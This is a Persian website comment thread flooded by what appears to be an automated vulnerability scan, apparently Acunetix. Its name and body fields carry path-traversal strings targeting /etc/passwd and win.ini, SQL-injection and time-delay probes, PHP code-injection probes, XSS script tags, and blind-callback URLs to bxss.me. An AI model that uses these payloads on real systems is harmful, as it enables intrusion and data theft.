.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۸نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۸نوشت:

WEB-INF/web.xml?

bklymfbl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۸نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۸نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۹نوشت:

WEB-INF\\web.xml?

bklymfbl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۰۹نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۰نوشت:

1

sample@email.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۰نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۰نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۰نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۱نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۱نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۲نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۳نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۳نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۳نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۴نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۴نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۴نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۵نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۵نوشت:

1

dpfjgros در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۵نوشت:

${9999194+9999578}

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۵نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۶نوشت:

1

dpfjgros در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۶نوشت:

1

${10000173+9999738} در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۶نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۷نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۷نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۷نوشت:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۸نوشت:

1some_inexistent_file_with_long_name\0.jpg

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۸نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۸نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۹نوشت:

Http://testasp.vulnweb.com/t/fit.txt

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۹نوشت:

http://testasp.vulnweb.com/t/fit.txt?.jpg

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۱۹نوشت:

1

doycfqgl در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۰نوشت:

ZzQ0WVFqeTdoSEg1bmgzZ2FEcGFKUTFuTzduemNJcFBhMTdiQXlja094TjBMaVBIUg==

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۰نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۰نوشت:

testasp.vulnweb.com

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۰نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۰نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۱نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۱نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۱نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۱نوشت:

1

tiggnlip در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۱نوشت:

1&n922351=v922715

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۱نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۲نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۲نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۲نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۲نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۲نوشت:

1

tjklefgd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۳نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۳نوشت:

1

dbqvfxqg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۴نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۴نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۴نوشت:

1

cdmvbryi&n913185=v928286 در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۴نوشت:

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۴نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۴نوشت:

1

1some_inexistent_file_with_long_name\0.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۵نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۵نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۵نوشت:

1

Http://testasp.vulnweb.com/t/fit.txt در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۵نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۵نوشت:

1

http://testasp.vulnweb.com/t/fit.txt?.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۶نوشت:

1

vibwwlsg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۶نوشت:

)

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۶نوشت:

1

vibwwlsg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۶نوشت:

!(()&&!|*|*|

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۶نوشت:

1

testasp.vulnweb.com در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۷نوشت:

1

vibwwlsg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۷نوشت:

^(#$!@#$)(()))******

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۸نوشت:

1

vibwwlsg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۸نوشت:

1

mvkxahjs در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۸نوشت:

mvkxahjs در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۹نوشت:

'"()

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۹نوشت:

1

vibwwlsg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۹نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۹نوشت:

1

mvkxahjs در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۲۹نوشت:

1

vibwwlsg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۰نوشت:

1

mvkxahjs در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۰نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۰نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۰نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۰نوشت:

1

) در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۱نوشت:

1

'"() در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۱نوشت:

1

mljnjgsi در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۱نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۲نوشت:

1

!(()&&!|*|*| در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۲نوشت:

1

sample%40email.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۲نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۲نوشت:

;print(md5(acunetix_wvs_security_test));

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۳نوشت:

1

^(#$!@#$)(()))****** در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۳نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۳نوشت:

';print(md5(acunetix_wvs_security_test));$a='

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۳نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۴نوشت:

";print(md5(acunetix_wvs_security_test));$a="

vdddqiwh در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۴نوشت:

http://testasp.vulnweb.com/t/xss.html?%00.jpg

sample%40email.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۴نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۴نوشت:

${@print(md5(acunetix_wvs_security_test))}

vdddqiwh در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۵نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۵نوشت:

${@print(md5(acunetix_wvs_security_test))}\\

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۵نوشت:

1

http://testasp.vulnweb.com/t/xss.html?%00.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۶نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۶نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۶نوشت:

1

-1 OR 2+653-653-1=0+0+0+1 -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۶نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۷نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۷نوشت:

1

-1 OR 3+653-653-1=0+0+0+1 -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۸نوشت:

1

bdlovsbe در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۸نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۸نوشت:

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%87-16-Diagramming

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۸نوشت:

1

../../../../../../../../../../etc/passwd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۸نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۹نوشت:

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%87-16-Diagramming

-1 OR 3*2<(0+5+653-653) -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۹نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۹نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۹نوشت:

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%87-16-Diagramming/.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۹نوشت:

1

mrvxjjog در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۳۹نوشت:

1

-1 OR 3*2>(0+5+653-653) -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۰نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۰نوشت:

1

;print(md5(acunetix_wvs_security_test)); در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۰نوشت:

1

../../../../../../../../../../etc/passwd\0.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۰نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۰نوشت:

1

';print(md5(acunetix_wvs_security_test));$a=' در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۱نوشت:

1

-1 OR 2+587-587-1=0+0+0+1 در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۱نوشت:

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۱نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۱نوشت:

1

";print(md5(acunetix_wvs_security_test));$a=" در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۱نوشت:

1

biyvfhbq در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۲نوشت:

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۲نوشت:

1

${@print(md5(acunetix_wvs_security_test))} در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۲نوشت:

1

sample%40email.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۲نوشت:

1

${@print(md5(acunetix_wvs_security_test))}\\ در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۲نوشت:

1

-1 OR 3+587-587-1=0+0+0+1 در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۲نوشت:

1

/../..//../..//../..//../..//../..//etc/passwd\0.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۳نوشت:

1

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%87-16-Diagramming در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۳نوشت:

1

rdqiuksg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۳نوشت:

http://hitkWwBqftUWs.bxss.me/

.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۳نوشت:

1

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%87-16-Diagramming در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۳نوشت:

1

-1 OR 3*2<(0+5+587-587) در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۳نوشت:

1

%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%D8%B4%D8%A8%DA%A9%D9%87-16-Diagramming/. در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۴نوشت:

1

/etc/passwd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۴نوشت:

1

rdqiuksg در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۴نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۴نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1

-1 OR 3*2>(0+5+587-587) در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۴نوشت:

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۵نوشت:

1

http://hitJjJ2HxDMnA.bxss.me/ در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۵نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۵نوشت:

1'"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۶نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۶نوشت:

\\

gqigksam در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۶نوشت:

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1' OR 2+296-296-1=0+0+0+1 -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۶نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۶نوشت:

1

gqigksam در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۷نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۷نوشت:

-1' OR 3+296-296-1=0+0+0+1 -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۷نوشت:

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././ در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۷نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۷نوشت:

@@ZacxH

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۷نوشت:

1

file:///etc/passwd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۸نوشت:

1

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۸نوشت:

www.vulnweb.com

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۹نوشت:

JyI=

-1' OR 3*2<(0+5+296-296) -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۹نوشت:

1

/\\../\\../\\../\\../\\../\\../\\../etc/passwd در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۹نوشت:

1

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۹نوشت:

http://www.vulnweb.com

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۴۹نوشت:

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۰نوشت:

WEB-INF/web.xml در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۰نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۰نوشت:

(select convert(int,CHAR(65)))

WEB-INF\\web.xml در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۱نوشت:

1

-1' OR 3*2>(0+5+296-296) -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۱نوشت:

1

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۱نوشت:

//www.vulnweb.com

../../../../../../../../../../windows/win.ini در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۲نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۲نوشت:

1

../../../../../../../../../../boot.ini در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۲نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۳نوشت:

1

../../../../../../../../../../windows/win.ini\0.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۳نوشت:

1

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۳نوشت:

/\\www.vulnweb.com

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۴نوشت:

1

-1" OR 2+754-754-1=0+0+0+1 -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۴نوشت:

1

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۴نوشت:

1

در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۴نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۴نوشت:

1

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۵نوشت:

1

................windowswin.ini در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۵نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۵نوشت:

1

-1" OR 3+754-754-1=0+0+0+1 -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۵نوشت:

1

..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۶نوشت:

1

yilyywjo در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۶نوشت:

'"

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۶نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۶نوشت:

1

/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۷نوشت:

1

yilyywjo در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۷نوشت:

<!--

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۷نوشت:

1

yilyywjo در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۷نوشت:

1

-1" OR 3*2<(0+5+754-754) -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۷نوشت:

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۸نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۸نوشت:

1

yilyywjo در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۸نوشت:

1

kdxomvjr در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۸نوشت:

1

-1" OR 3*2>(0+5+754-754) -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۸نوشت:

1

'" در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۸نوشت:

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۸نوشت:

1

www.vulnweb.com در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۹نوشت:

1

esmbegbj در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۹نوشت:

1

<!-- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۹نوشت:

1

http://www.vulnweb.com در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۹نوشت:

1

unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\ در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۹نوشت:

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()= در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۹نوشت:

1

sample%40email.tst در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۵:۵۹نوشت:

1

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۰نوشت:

TicketBtn=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%b8%d8%b1'"()&%<acx><ScRiPt >prompt(931282)</ScRiPt>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0 در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۰نوشت:

1

1'" در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۰نوشت:

1

WEB-INF/web.xml? در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۰نوشت:

1

1 waitfor delay '0:0:3' -- در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۰نوشت:

1

bfsqavid در تاریخ: ۲۴ اسفند ۱۳۹۵ _ ۱۶:۴۶:۰۰نوشت:

'"()&%<acx><ScRiPt >prompt(944646)</ScRiPt>

